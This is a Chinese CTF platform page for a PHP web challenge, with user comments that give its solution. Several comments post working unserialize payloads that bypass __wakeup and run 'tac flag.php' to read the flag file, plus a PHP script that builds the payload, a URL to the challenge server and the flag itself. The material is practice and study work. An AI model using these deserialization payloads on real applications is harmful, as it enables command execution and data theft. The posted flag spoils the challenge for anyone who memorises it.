安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 1798
提  示:
描  述:
flag{}
评论
LLTVLL 8天前

AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。

回复 0

Bojing 5月前

有哪里提示了username是admin的吗

回复 0
numberone 3月前

源代码里不是有个if语句:if ($this->username === 'admin')

回复 0

18956160518 6月前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 0

EtHat 9月前

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

xht0525 11月前

nl flag.php|base64

回复 0

不会编程的崽 11月前

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

回复 0

不会编程的崽 11月前

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

c41vin 1年前

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

回复 0

wxy1343 1年前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

wxy1343 1年前

flag{Unser1alize_and_2CE_Add}

回复 0

WriteUp

image
小赵同学

3 金币

评分(3)

解题动态

hhh6 攻破了该题 2天前
yjkk 攻破了该题 4天前
asfdafaw 攻破了该题 5天前
LLTVLL 攻破了该题 8天前
loulegedadong 攻破了该题 16天前
yhcyhc 攻破了该题 19天前
emm不取名字了 攻破了该题 21天前
hxnter 攻破了该题 24天前
xiaopohai1 攻破了该题 26天前
AkiLid 攻破了该题 27天前
l1nci 攻破了该题 1月前
18894292492 攻破了该题 1月前
ju5t1 攻破了该题 1月前
POEighT 攻破了该题 1月前
zc341 攻破了该题 1月前
popofthedead 攻破了该题 1月前
Nan123 攻破了该题 1月前
chenduowen 攻破了该题 1月前
Vvvvvv 攻破了该题 1月前
miko88 攻破了该题 1月前